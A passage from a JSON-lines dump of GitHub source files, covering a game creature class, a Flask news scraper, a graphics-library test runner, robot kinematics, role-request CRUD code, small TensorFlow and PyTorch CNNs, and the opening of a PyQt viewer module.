intelligence\n\n def attack(self, target):\n raise NotImplementedError\n\n def resistance(self, stat):\n return self.dexterity - stat\n\n def weapon_attack(self, target):\n resistance = self.resistance(target.strength)\n damage = self.strength*5 - resistance * 2\n self._attack_helper(target, damage)\n\n def spell_attack(self, target):\n self.mana -= 10\n resistance = self.resistance(target.intelligence)\n damage = self.intelligence*5 - resistance * 2\n self._attack_helper(target, damage)\n\n def _attack_helper(self, target, damage):\n critical = False\n if random.randint(0, 9) == 0:\n damage *= 2\n critical = True\n outputcontroller.attacks(self.name, target.name, damage, critical)\n target.hp -= damage\n","repo_name":"tsvetankoev/Rogue-like-like","sub_path":"src/creature.py","file_name":"creature.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"47834244914","text":"''' \npythonanywhere has a whitelist of sites\nand free users are only allowed to request html from those\nwhitelisted sites\n\neither ask pythonanywhere to add sites to whitelist or\ncheck out how to deploy on AWS instead maybe:\n\nhttps://victormerino.medium.com/running-a-python-script-24-7-in-cloud-for-free-amazon-web-services-ec2-76af166ae4fb\n'''\n\n# folder that the scrapers are in\nSCRAPERS_FOLDER_NAME = 'website_scrapers'\n\n\"\"\"\nTo add new scrapers, put the scraping function into its own file in the website_scrapers folder.\n\nSee the existing examples in the website_scrapers folder for clarification.\n\nNext, add the name of the file and function names that the scraper is in to the array below.\n\"\"\"\n# file name first, then function name\nSCRAPERS = [\n ['scrape_bbc.py', 'scrape_bbc'],\n ['scrape_detroit_news.py', 'scrape_detroit_news'],\n ['scrape_mlive.py', 'scrape_mlive']\n]\n\nKEYWORDS = [\n \"ocean\",\n \"polar\",\n \"electric\",\n \"nature\",\n \"iceberg\",\n \"biodiversity\",\n \"green\",\n \"warm\",\n \"biology\",\n \"plant\",\n \"living\",\n \"carbon\",\n \"coronavirus\",\n 'abatement',\n 'acid',\n 'air pollution',\n 'air quality',\n 'algae',\n 'algal blooms',\n 'alternative energy sources',\n 'amenities',\n 'atmosphere',\n 'backyard burning',\n 'ber',\n 'biodegradable waste',\n 'biodiversity',\n 'bioenergy',\n 'biofuels',\n 'biomass',\n 'biosphere',\n 'black bin (grey bin)',\n 'bring bank',\n 'brown bin',\n 'bye-law',\n 'carbon',\n 'carpooling',\n 'cfcs',\n 'cfl bulbs',\n 'civic amenity site',\n 'climate',\n 'climate change',\n 'compost',\n 'compostable',\n 'composting',\n 'conservation',\n 'cryptosporidium',\n 'deforestation',\n 'development plan',\n 'dioxins',\n 'disposal',\n 'domestic charges',\n 'domestic waste',\n 'draught proofing',\n 'dumping',\n 'ecosystem',\n 'ecotourism',\n 'effluent',\n 'electric vehicle',\n 'emissions',\n 'emissions projections',\n 'emssions trading allowance',\n 'end-of-life vehicle',\n 'energy efficiency',\n 'energy rating',\n 'energy star',\n 'environmental impact statement',\n 'flora and fauna',\n 'fossil fuels',\n 'fuel poverty',\n 'global warming',\n 'green bin',\n 'green design',\n 'greener homes scheme',\n 'greenhouse effect',\n 'greenhouse gases',\n 'ground water',\n 'habitat',\n 'hazardous waste',\n 'home energy saving scheme',\n 'household waste',\n 'incinerator',\n 'insulation',\n 'kyoto protocol',\n 'kyoto agreement',\n 'landfill',\n 'litter',\n 'mbt',\n 'mulch',\n 'municipal waste',\n 'noise pollution',\n 'npws',\n 'nss',\n 'noxious gases',\n 'oil spill',\n 'organic food',\n 'organic',\n 'organism',\n 'ozone layer',\n 'particulate matter',\n 'pay by weight',\n 'pesticides',\n 'permits',\n 'planning permission',\n 'plastic bag levy',\n 'post-consumer waste',\n 'radiation',\n 'radioactive',\n 'radon',\n 'recycle',\n 'reforestation',\n 'refuse',\n 'renewable',\n 'reuse',\n 'river basin',\n 'sewage',\n 'smog',\n 'smokeless fuel',\n 'solar panel',\n 'standing charges',\n 'surface water',\n 'sustainable',\n 'toxic',\n 'toxin',\n 'traffic calming',\n 'traffic management',\n 'tidy towns',\n 'utility',\n 'un framework convention on climate change',\n 'unesco world heritage site',\n 'ventilation',\n 'warmer homes scheme',\n 'waste management',\n 'waste prevention',\n 'water vapour',\n 'weee',\n 'wind energy',\n 'wind turbine',\n 'zero emissions',\n]\n\n################################################################\n# Configuration Stuff Above, Main Code Below\n################################################################\n\n# flask: web framework for rendering website\nfrom flask import Flask, render_template\n\n# importlib: dynamically import scrapers (no need to add new functions and stuff below when additional scrapers are made)\nfrom importlib import import_module \n\nfrom filter_for_keywords import filter_for_keywords\n\n# dynamically imports the scraper functions from the scrapers array (each scraper in the array is itself an array where the first item is the name of the file the scraper is in and the second item the name of the scraping function within that file)\n# returns a list of all the imported scraper functions\ndef import_scraper_functions(folder_name, scrapers):\n # list to be returned at end containing all the imported scraper functions\n all_scraper_functions = []\n\n # import each scraper_function, and use it to\n # scrape and filter articles from each website\n # and finally add every article into all_articles\n for file_name, function_name in scrapers:\n # remove the .py from end if its included in original file_name\n # this is because import_module only takes in the file_name without any .py extension\n if file_name.endswith('.py'):\n file_name = file_name[:-3]\n\n # format the filepath so that it can be imported by import_module\n formatted_filepath = folder_name + '.' + file_name\n\n # import the file containing the scraping function\n scraper_file = import_module(formatted_filepath)\n\n # get the actual scraping function from the imported file\n scraper_function = getattr(scraper_file, function_name)\n\n\n # add newly imported scraper function to the overarching list\n all_scraper_functions.append(scraper_function)\n\n return all_scraper_functions\n\n# runs all the scraper functions in the list given to it\n# and uses them to scrape, and filter, the articles from each website\n# finally, it returns a giant dictionary containing all the scraped and filtered articles across all the websites\n# this function may need to be made async in the future, if it takes too much time to run all the scrapers 1-by-1\ndef get_articles(scraper_functions, keywords):\n # will use this to return combined filtered articles dictionary across all websites\n # keys are article titles, vals are article url's\n all_articles = {}\n\n for scraper_function in scraper_functions:\n # run the scraper\n scraped_articles = scraper_function()\n filtered_articles = filter_for_keywords(scraped_articles, keywords)\n # add scraped & filtered articles from a particular website to all_articles\n all_articles.update(filtered_articles)\n \n return all_articles\n\napp = Flask('app')\n\n@app.route('/')\ndef main():\n # import the various scraper functions we made\n scraper_functions = import_scraper_functions(SCRAPERS_FOLDER_NAME, SCRAPERS)\n\n # run the scraper functions, and filter the scraped articles, and combine all articles into one dictionary\n articles = get_articles(scraper_functions, KEYWORDS)\n\n # make the actual website\n return render_template('main.html', articles=articles )\n\n@app.route('/generalized_scraper')\ndef run_generalized_scraper():\n import generalized_scraper\n\n scraper_inputs = [\n {\n 'name': 'BBC Science & Environment',\n 'url': 'https://www.bbc.com/news/science_and_environment',\n 'prefix': 'https://bbc.com',\n 'link_selector': 'a[href ^= \"/news\"].gs-c-promo-heading',\n 'headline_selector': 'h3',\n },\n {\n 'name': 'Detroit News',\n 'url': 'https://www.detroitnews.com/news/',\n 'prefix': 'https://www.detroitnews.com/story',\n 'link_selector': 'a.gnt_m_flm_a',\n 'headline_selector': None,\n },\n {\n 'name': 'Mlive',\n 'url': 'https://www.mlive.com/',\n 'prefix': '',\n 'link_selector': 'a[data-ga-content-type = \"article\"]',\n 'headline_selector': None,\n }\n ]\n\n articles = generalized_scraper.get_articles(scraper_inputs)\n\n articles = filter_for_keywords(articles, KEYWORDS)\n\n return render_template('main.html', articles=articles)\n\napp.run(host='0.0.0.0', port=8080)","repo_name":"DhanujG/NLP-Machine-Learning-in-Environmental-News-Web-Scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"7000152344","text":"import os\nimport sys\nimport json\nimport argparse\n\n# returns a normalized path to the project root directory\ndef get_root_dir():\n import sys\n\n return os.path.normpath(\n os.path.join(\n os.path.dirname(sys.argv[0]),\n os.path.pardir\n )\n )\n\n\n# returns the path to the build directory\ndef get_build_dir(options):\n try:\n with open(os.path.join(get_root_dir(), \"BINARY_DIR\"), \"rt\") as bdf:\n return bdf.read()\n except: return os.path.join(get_root_dir(), \"_build\");\n\n\n# returns the path to the config script\ndef configure_script():\n return os.path.join(get_root_dir(), \"configure.py\")\n\n\n# executes a command in a subprocess\ndef execute_command(options, cmd_line, work_dir, simulate=None, quiet=False):\n import subprocess\n\n if simulate is None: simulate = options.dry_run\n if simulate or not quiet:\n if len(cmd_line) == 1:\n cmd_str = cmd_line[0]\n else: cmd_str = cmd_line[0]+\" '\"+str(\"' '\").join(cmd_line[1:])+\"'\"\n\n if work_dir == os.path.curdir:\n print(cmd_str)\n else: print(\"(cd %s && %s)\" % (work_dir, cmd_str))\n sys.stderr.write(\"%s\\n\" % cmd_str)\n if not simulate:\n subprocess.check_call(cmd_line, cwd=work_dir)\n\n# executes the configure script\ndef execute_configure(options, parameters, simulate=None, quiet=False):\n\n if options.jobs is None:\n job_params = list()\n else: job_params = [\"--jobs\", str(options.jobs)]\n\n execute_command(\n options,\n [configure_script()]+job_params+parameters+options.config_options,\n get_root_dir(),\n simulate, quiet\n )\n\n# executes ctest in the configured test directory\ndef execute_ctest(options):\n if options.jobs is None:\n job_params = list()\n else: job_params = [\"-j\", str(options.jobs)]\n\n test_dir = os.path.join(get_build_dir(options), \"test\")\n\n import subprocess\n\n try:\n execute_command(\n options,\n [\"ctest\"]+job_params,\n test_dir\n );\n except subprocess.CalledProcessError as procError:\n failed_tests_path = os.path.join(\n test_dir,\n \"Testing\", \"Temporary\", \"LastTestsFailed.log\"\n )\n with open(failed_tests_path) as failed_tests:\n for line in failed_tests:\n test_name = line.rstrip().split(':')[1]\n test_lib = test_name.split('-')[0]\n\n try:\n cmd_line = [\"ctest\", \"-VV\", \"-R\", test_name];\n proc = subprocess.Popen(\n cmd_line,\n stdout=sys.stderr,\n stderr=sys.stderr,\n cwd=test_dir)\n proc.communicate()\n except subprocess.CalledProcessError:\n pass\n except OSError as osError:\n if osError.errno == os.errno.ENOENT:\n pass\n sys.stderr.write(\"%s\\n\" % (str(procError)))\n\n\n# options for the --gl-apis parameter\ngl_libs_names = [\"default\", \"all-apis\", \"all-libs\"]\n# options for the --test-level parameter\ntest_level_names = [\"minimal\", \"basic\", \"extended\", \"complete\"]\n# options for the --test-type parameter\ntest_type_names = [\"everything\", \"ctest\", \"build-examples\", \"configure-gl\"]\n\n# checks if arg is valid option for --gl-libs\ndef gl_libs_value(arg):\n if(arg in gl_libs_names):\n return arg;\n else:\n msg = \"'%s' is not a valid GL library combination\" % str(arg)\n raise argparse.ArgumentTypeError(msg)\n\n# checks if arg is valid option for --test-level\ndef test_level_value(arg):\n if(arg in test_level_names):\n return arg;\n else:\n msg = \"'%s' is not a valid test level\" % str(arg)\n raise argparse.ArgumentTypeError(msg)\n\n# checks if arg is valid option for --test-type\ndef test_type_value(arg):\n if(arg in test_type_names):\n return arg;\n else:\n msg = \"'%s' is not a valid test type\" % str(arg)\n raise argparse.ArgumentTypeError(msg)\n\n\n# checks if the value specfied as --test-level was at least level\ndef test_level_at_least(options, level):\n result = True\n for name in test_level_names:\n if name == level:\n break\n if name == options.test_level:\n result = False\n return result\n\n# checks if the value specfied as --gl-libs was at least level\ndef gl_libs_at_least(options, level):\n result = True\n for name in gl_libs_names:\n if name == level:\n break\n if name == options.gl_libs:\n result = False\n return result\n\n\ndef execute_tests(options, parameters):\n for name in set(options.test_type):\n if name == \"everything\":\n execute_configure(options, parameters+[\"--build\"])\n execute_ctest(options)\n elif name == \"ctest\":\n execute_configure(options, parameters+[\"--no-examples\"])\n execute_ctest(options)\n elif name == \"build-examples\":\n execute_configure(options, parameters+[\"--no-tests\", \"--build\"])\n elif name == \"configure-gl\":\n execute_configure(options, parameters+[\"--gl-tests-compile-only\", \"--debug-gl-ver-error\", \"--no-tests\", \"--no-examples\"])\n\n\ndef for_each_gl_init_lib(options, parameters):\n func = execute_tests\n if gl_libs_at_least(options, \"all-libs\"):\n for gl_init_lib in options.config_info['gl_init_libs']:\n func(options, parameters+[\"--use-gl-init-lib=%s\" % gl_init_lib])\n else:\n func(options, parameters)\n\n\ndef for_each_gl_api_lib(options, parameters):\n func = for_each_gl_init_lib\n if gl_libs_at_least(options, \"all-apis\"):\n for gl_api_lib in options.config_info['gl_api_libs']:\n func(options, parameters+[\"--use-gl-api-lib=%s\" % gl_api_lib])\n else:\n func(options, parameters)\n\n\ndef for_each_profile(options, parameters):\n func = for_each_gl_api_lib\n if not test_level_at_least(options, \"extended\"):\n parameters = parameters+[\"--no-enum-tests\"]\n\n if test_level_at_least(options, \"basic\"):\n func(options, parameters+[\"--low-profile=True\"])\n func(options, parameters+[\"--low-profile=False\"])\n else:\n func(options, parameters)\n\n\n# creates the command line argument parser\ndef get_argument_parser():\n\n def JobCountValue(arg):\n msg_fmt = \"'%s' is not a valid process count value\"\n try:\n if int(arg) <= 0:\n msg = msg_fmt % str(arg)\n raise argparse.ArgumentTypeError(msg)\n else:\n return int(arg)\n except:\n msg = msg_fmt % str(arg)\n raise argparse.ArgumentTypeError(msg)\n\n argparser = argparse.ArgumentParser(\n prog=\"test\",\n description=\"\"\"\n Utility script running various tests\n \"\"\",\n epilog=\"\"\"\n Copyright (c) Matúš Chochlík.\n Permission is granted to copy, distribute and/or modify this document\n under the terms of the Boost Software License, Version 1.0.\n (See a copy at http://www.boost.org/LICENSE_1_0.txt)\n \"\"\"\n )\n\n argparser.add_argument(\n \"--dry-run\",\n default=False,\n action=\"store_true\",\n help=\"\"\"\n Only print the commands that should be executed\n but don't do anything.\n \"\"\"\n )\n\n argparser.add_argument(\n \"--development\",\n default=False,\n action=\"store_true\",\n help=\"\"\"\n Run all tests usually done for development testing.\n \"\"\"\n )\n argparser.add_argument(\n \"--release\",\n default=False,\n action=\"store_true\",\n help=\"\"\"\n Run all tests usually done for release candidate testing.\n \"\"\"\n )\n\n argparser.add_argument(\n \"--jobs\",\n type=JobCountValue,\n default=None,\n action=\"store\",\n help=\"\"\"\n Specifies the number of parallel jobs to be used.\n \"\"\"\n )\n\n argparser.add_argument(\n \"--max-jobs\",\n type=JobCountValue,\n default=None,\n action=\"store\",\n help=\"\"\"\n Specifies the maximum number of parallel jobs to be used.\n \"\"\"\n )\n\n argparser.add_argument(\n \"--gl-libs\",\n type=gl_libs_value,\n default=None,\n help=\"\"\"\n Influences the GL library combinations with which\n the tests are configured and executed (%(options)s).\n \"\"\" % {\"options\": str(gl_libs_names)}\n )\n\n argparser.add_argument(\n \"--test-level\",\n type=test_level_value,\n default=None,\n help=\"\"\"\n Influences the number of configurations in which\n the tests are executed (%(options)s).\n \"\"\" % {\"options\": str(test_level_names)}\n )\n\n argparser.add_argument(\n \"--test-type\",\n type=test_type_value,\n default=list(),\n action=\"append\",\n help=\"\"\"\n Specifies the test type(s) to be executed (%(options)s).\n \"\"\" % {\"options\": str(test_type_names)}\n )\n\n argparser.add_argument(\n \"--config-info\",\n default=dict()\n )\n\n argparser.add_argument(\n \"--config\",\n dest=\"config_options\",\n nargs=argparse.REMAINDER,\n default=list(),\n help=\"\"\"\n Everything following this option will be passed\n to configure verbatim.\n \"\"\"\n )\n\n return argparser\n\n\ndef main():\n import os, sys\n try:\n # parse and process the command-line arguments\n argparser = get_argument_parser()\n options = argparser.parse_args()\n\n # set the test level if none\n if options.test_level is None:\n if options.release:\n options.test_level = \"complete\"\n elif options.development:\n options.test_level = \"basic\"\n else: options.test_level=\"minimal\"\n\n # set the test type if empty\n if len(options.test_type) == 0:\n options.test_type = [\"everything\"]\n\n if options.jobs is None:\n try:\n import multiprocessing\n options.jobs = multiprocessing.cpu_count()+1\n except: pass\n\n # limit the number of jobs\n if options.jobs is not None and options.max_jobs is not None:\n if options.jobs > options.max_jobs:\n options.jobs = options.max_jobs\n\n # set the gl-libs if none\n if options.gl_libs is None:\n if options.release:\n options.gl_libs = \"all-libs\"\n elif options.development:\n options.gl_libs = \"all-apis\"\n elif test_level_at_least(options, \"basic\"):\n options.gl_libs =\"all-apis\"\n else: options.gl_libs =\"default\"\n\n\n # if necessary ..\n if gl_libs_at_least(options, \"all-apis\"):\n # get configuration info\n execute_configure(\n options,\n [\"--clean\", \"--info-only\"],\n simulate=False,\n quiet=True\n )\n # load configuration info\n options.config_info = json.load(\n open(os.path.join(get_build_dir(options), 'config', 'info.json'))\n )\n\n for_each_profile(options, [\"--clean\", \"--with-clang-tidy\"])\n\n except RuntimeError as rte:\n print(\"Runtime error: \" + str(rte))\n\nif __name__ == \"__main__\": main()\n\n","repo_name":"matus-chochlik/oglplu2","sub_path":"tools/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":11392,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"21"} +{"seq_id":"17428765862","text":"# Solve lab1 robot forward kinematics by another Denavit-Hartenberg convention\nimport numpy as np\nfrom tests import sanity_checks, lab_trials\n\n\ndef forward_k(q_list):\n \"\"\"Compute forward kinematics by D-H approach\n Args:\n q_list: a list of q values\n Returns:\n end effector position as an array\n \"\"\"\n\n def DH_T(params):\n \"\"\"Give the tranformation given D-H parameters\n Args:\n params: alpha, a, d, phi as a list\n Returns:\n 4x4 transformation matrix\n \"\"\"\n alpha, a, d, phi = params\n cp = np.cos(phi)\n sp = np.sin(phi)\n ca = np.cos(alpha)\n sa = np.sin(alpha)\n return np.array([[cp, -sp, 0, a],\n [sp*ca, cp*ca, -sa, -d*sa],\n [sp*sa, cp*sa, ca, d*ca],\n [0, 0, 0, 1]])\n\n # Convert to radians, and put q6 to front\n q_converted = [q_list[-1]] + list(np.deg2rad(q_list[:-1]))\n\n # DH parameters in the order of alpha, a, d, phi\n DH_parameters = [[0, 0, 10, q_converted[1]],\n [-np.pi/2, 0, 0, -np.pi/2+q_converted[2]],\n [0, 10, 0, np.pi/2+q_converted[3]],\n [0, 10, 0, -np.pi/2+q_converted[4]],\n [-np.pi/2, 0, 2, np.pi+q_converted[5]]]\n\n # Form and concatenate transformation matrices together\n T = np.identity(4)\n for params in DH_parameters:\n T = np.matmul(T, DH_T(params))\n\n # Return position, with track translation added\n return T[:3, 3] + np.array([q_converted[0], 0, 0])\n\n\nif __name__ == \"__main__\":\n sanity_checks(forward_k)\n lab_trials(forward_k)\n","repo_name":"one-for-all/TF-ES259-Labs","sub_path":"lab1/dh2_solution.py","file_name":"dh2_solution.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23622533988","text":"from typing import List\nfrom backend.db.base import CRUDBase\nfrom backend.core.config import settings\nfrom backend.models.user import User\nfrom backend.models.roles import AnswerChangeRoleRequest, ChangeRoleRequest, ChangeRoleRequestStatus\n\n\nclass ChangeRolesCruds(CRUDBase):\n def send_change_role_message(self, user_id, message, files) -> ChangeRoleRequest:\n db_change_role_request = ChangeRoleRequest(\n files=files,\n message=message,\n user_id=user_id\n )\n return self.create(db_change_role_request)\n\n def get_all_change_role_messages(self, page: int = 1, filter: ChangeRoleRequestStatus = None, page_size: int = settings.CHANGE_ROLE_PAGE_ITEMS) -> List[ChangeRoleRequest]:\n end = page * page_size\n query = self.db.query(ChangeRoleRequest).order_by(\n ChangeRoleRequest.id.desc())\n if filter:\n query = query.where(ChangeRoleRequest.request_status == filter)\n return query.slice(end-page_size, end).all()\n\n def get_user_change_role_messages(self, user_id, page: int, page_size: int = settings.CHANGE_ROLE_PAGE_ITEMS):\n\n end = page * page_size\n return self.db.query(ChangeRoleRequest).filter(ChangeRoleRequest.user_id == user_id).order_by(ChangeRoleRequest.id.desc()).slice(end-page_size, end).all()\n\n def get_current_user_change_role_message(self, user_id):\n return self.db.query(ChangeRoleRequest).filter(ChangeRoleRequest.user_id == user_id, ChangeRoleRequest.request_status == ChangeRoleRequestStatus.in_progress).first()\n\n def is_has_change_role_messages(self, user_id):\n return bool(self.db.query(ChangeRoleRequest).filter(ChangeRoleRequest.user_id == user_id).first())\n\n def user_have_active_change_role_request(self, user_id: int) -> bool:\n result = self.db.query(ChangeRoleRequest)\\\n .filter(ChangeRoleRequest.user_id == user_id, ChangeRoleRequest.request_status == ChangeRoleRequestStatus.in_progress)\\\n .first()\n return result is not None\n\n def user_have_change_role_request(self, user_id: int) -> bool:\n result = self.db.query(ChangeRoleRequest)\\\n .filter(ChangeRoleRequest.user_id == user_id)\\\n .first()\n return result is not None\n\n def get_change_role_message(self, request_id) -> ChangeRoleRequest:\n return self.db.query(ChangeRoleRequest).filter(ChangeRoleRequest.id == request_id).first()\n\n def send_change_role_message_answer(self, request: ChangeRoleRequest, message: str, request_status: ChangeRoleRequestStatus):\n answer: AnswerChangeRoleRequest = request.answer\n user: User = request.user\n if request_status == ChangeRoleRequestStatus.accepted:\n user.type = settings.UserTypeEnum.musician\n elif request_status == ChangeRoleRequestStatus.rejected:\n user.type = settings.UserTypeEnum.user\n self.update(user)\n if not answer:\n answer = self.create(AnswerChangeRoleRequest(\n request_id=request.id,\n message=message\n ))\n else:\n answer.message = message\n self.update(answer)\n request.request_status = request_status\n self.update(request)\n return answer\n\n def get_not_answered_change_role_request_count(self):\n return self.db.query(ChangeRoleRequest).filter(ChangeRoleRequest.request_status == ChangeRoleRequestStatus.in_progress).count()\n","repo_name":"Semolik/music","sub_path":"backend/crud/crud_change_roles.py","file_name":"crud_change_roles.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"38624074786","text":"import tensorflow as tf\nimport numpy as np\nfrom tensorflow import keras\n\n# Loading the data\nfashion_mnist = keras.datasets.fashion_mnist\n(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\nmodel = keras.models.Sequential([\n\tkeras.layers.Conv2D(64, (3, 3), activation = 'relu', input_shape = (28, 28, 1)),\n\tkeras.layers.MaxPooling2D(2, 2),\n\tkeras.layers.Conv2D(64, (3, 3), activation = 'relu'),\n\tkeras.layers.MaxPooling2D(2, 2),\n\tkeras.layers.Flatten(),\n\tkeras.layers.Dense(128, activation = 'relu'),\n\tkeras.layers.Dense(10, activation = 'softmax')\n\t])\n\nprint(model.summary())\n\ntrain_images = train_images.reshape(60000, 28, 28, 1)\ntest_images = test_images.reshape(10000, 28, 28, 1)\n\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n\nmodel.compile(optimizer = tf.train.AdamOptimizer(), loss = 'sparse_categorical_crossentropy', metrics = ['accuracy'])\nmodel.fit(train_images, train_labels, epochs = 10)\n\nprint(model.evaluate(test_images, test_labels))\n","repo_name":"tanmay2298/Tensorflow-Specialization","sub_path":"Intro/convolutions.py","file_name":"convolutions.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"86352314788","text":"import numpy as np\nimport cv2\n\ncaptureDevice = cv2.VideoCapture(0) # captureDevice = camera\n\nwhile True:\n ret, frame = captureDevice.read()\n\n cv2.imshow('my frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncaptureDevice.release()\ncv2.destroyAllWindows()\n","repo_name":"Team1559/Vision-2022","sub_path":"Vision2022/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"1477619996","text":"import psycopg2\nimport os\nfrom app.api.v2.models.db_model import Database\nfrom instance.config import app_config\nenv = os.getenv('FLASK_ENV')\nurl = app_config[env].DATABASE_URL\n\n\ndef db_connection():\n \"\"\"Create Database Connection\"\"\"\n\n connection = psycopg2.connect(url)\n return connection\n\n\ndef create_tables():\n \"\"\"Creates the Tables\"\"\"\n\n connection = db_connection()\n cursor = connection.cursor()\n\n database = Database()\n queries = database.db_query()\n\n for sql in queries:\n cursor.execute(sql)\n connection.commit()\n\n cursor.close()\n\n\ndef create_super_admin():\n \"\"\"create a default admin\"\"\"\n try:\n connection = db_connection()\n cursor = connection.cursor()\n database = Database()\n sql = database.add_admin()\n cursor.execute(sql)\n connection.commit()\n cursor.close()\n except:\n return 'user exists'\n","repo_name":"Benkimeric/iReporter-API","sub_path":"db_config.py","file_name":"db_config.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23175165550","text":"import sys\nimport time\nimport re\n\ndef validate_parenthesis(str):\n \n if len(str) > 10000:\n exit(1)\n \n number_of_parenthesis = 0 # Critério de corretude\n parenthesis = re.sub('\\w|[+|\\-|*|/]','',str) # Limpeza na string\n \n for char in parenthesis: # Checa os caractéres na string\n if char == '(': # Para '(' o critério aumenta\n number_of_parenthesis += 1 # Para ')' o critério diminui\n elif char == ')':\n number_of_parenthesis -= 1\n if number_of_parenthesis < 0: # Situação onde se fecha um \n return False # parentêses sem antes abri-lô\n \n if number_of_parenthesis != 0: # Se ao final, o critério for diferente\n return False # de 0, a expressão está incorreta.\n return True\n\ni = 0\nstart_time = time.time()\ninput_file = open('input.txt', 'r')\noutput_file = open('output.txt', 'w')\n\nfor expression in input_file.readlines():\n if i >= 10000:\n break\n if validate_parenthesis(expression):\n output_file.write(\"correct\\n\")\n i += 1\n else:\n output_file.write(\"incorrect\\n\")\n i += 1\n\nprint(\"--- %s seconds ---\" % (time.time() - start_time))","repo_name":"qedrohenrique/exercises","sub_path":"Others/Intereview 1/programa.py","file_name":"programa.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18194068170","text":"#CNN model\nimport torch\nfrom torch import nn\nfrom layers import *\n\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n\n self.maxpool = nn.MaxPool2d(kernel_size=(1,3), stride=(1,3), return_indices=False)\n\n self.conv1= nn.Sequential(\n nn.Conv2d(1, 50, kernel_size=(5,25), stride=1),\n nn.BatchNorm2d(50),\n nn.ELU(inplace=True))\n #nn.ReLU(inplace=True)\n self.conv2 = nn.Sequential(\n nn.Conv2d(50, 50, kernel_size=(3,5), stride=1),\n nn.BatchNorm2d(50),\n nn.ELU(inplace=True))\n # nn.ReLU(inplace=True)\n self.conv3=nn.Sequential(\n nn.Conv2d(50, 1000, kernel_size=(1,24)), #kernel_size !!!!! conv_mode,padding=0 by default\n #nn.ReLU(inplace=True),\n nn.ELU(inplace=True),\n nn.Dropout3d(p=0.5, inplace=False))\n self.conv4 = nn.Sequential(\n nn.Conv2d(1000, 500, kernel_size=1), # kernel_size !!!!! conv_mode,padding=0 by default\n nn.ELU(inplace=True),\n #nn.ReLU(inplace=True),\n nn.Dropout3d(p=0.5, inplace=False))\n self.conv5=nn.Sequential(\n nn.Conv2d(500, 88, kernel_size=1))#,\n #nn.Sigmoid())\n\n def forward(self, x):\n # (8L, 1L, 38L, 252L)\n x = self.conv1(x)#(8L, 50L, 34L, 228L)\n x = self.maxpool(x)#(8L, 50L, 34L, 76L)\n x = self.conv2(x) #(8L, 50L, 32L, 72L)\n x = self.maxpool(x)#(8L, 50L, 32L, 24L)\n x = self.conv3(x)# (8L, 1000L, 32L, 1L)\n x = self.conv4(x)#(8L, 500L, 32L, 1L)\n x = self.conv5(x)#(8L, 88L, 32L, 1L)\n #print x.shape\n return x\n\n\ndef get_model():\n net = Net()\n loss = Loss()\n return net, loss\n","repo_name":"Socierducode/DL_AMT_CNN","sub_path":"conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"36383011664","text":"'''\nPipedViewerPQ is a graphics viewer application written in PyQt\nthat receives its drawing and other commands primarily from another\napplication through a pipe. A limited number of commands are\nprovided by the viewer itself to allow saving and some manipulation\nof the displayed image. The controlling application, however, may\nbe unaware of these modifications made to the image.\n\nPipedViewerPQProcess is used to create and run a PipedViewerPQ.\n\nThis package was developed by the Thermal Modeling and Analysis\nProject (TMAP) of the National Oceanographic and Atmospheric\nAdministration's (NOAA) Pacific Marine Environmental Lab (PMEL).\n'''\n\nfrom __future__ import print_function\n\nimport sys\nimport os\nimport signal\nimport time\nimport math\n\n# First try to import PySide2, then try PyQt5 if that fails, and finally try PyQt4 if that fails\ntry:\n import PySide2\n PYTHONQT_VERSION = 'PySide2'\nexcept ImportError:\n try:\n import PyQt5\n PYTHONQT_VERSION = 'PyQt5'\n except ImportError:\n import PyQt4\n PYTHONQT_VERSION = 'PyQt4'\n\n# Now that the Python Qt version is determined, import the parts\n# allowing any import errors to propagate out\nif PYTHONQT_VERSION == 'PySide2':\n from PySide2.QtCore import Qt, QPointF, QRect, QRectF, QSize, QSizeF, QTimer\n from PySide2.QtGui import QBrush, QColor, QFontMetricsF, QImage, QPainter, \\\n QPalette, QPen, QPicture, QPixmap, QPolygonF, \\\n QTextDocument\n from PySide2.QtWidgets import QAction, QApplication, QDialog, QFileDialog, QLabel, \\\n QMainWindow, QMessageBox, QPushButton, QScrollArea\n from PySide2.QtSvg import QSvgGenerator\n from PySide2.QtPrintSupport import QPrinter\nelif PYTHONQT_VERSION == 'PyQt5':\n from PyQt5.QtCore import Qt, QPointF, QRect, QRectF, QSize, QSizeF, QTimer\n from PyQt5.QtGui import QBrush, QColor, QFontMetricsF, QImage, QPainter, \\\n QPalette, QPen, QPicture, QPixmap, QPolygonF, \\\n QTextDocument\n from PyQt5.QtWidgets import QAction, QApplication, QDialog, QFileDialog, QLabel, \\\n QMainWindow, QMessageBox, QPushButton, QScrollArea\n from PyQt5.QtSvg import QSvgGenerator\n from PyQt5.QtPrintSupport import QPrinter\nelse:\n from PyQt4.QtCore import Qt, QPointF, QRect, QRectF, QSize, QSizeF, QTimer, QString\n from PyQt4.QtGui import QAction, QApplication, QBrush, QColor, QDialog, \\\n 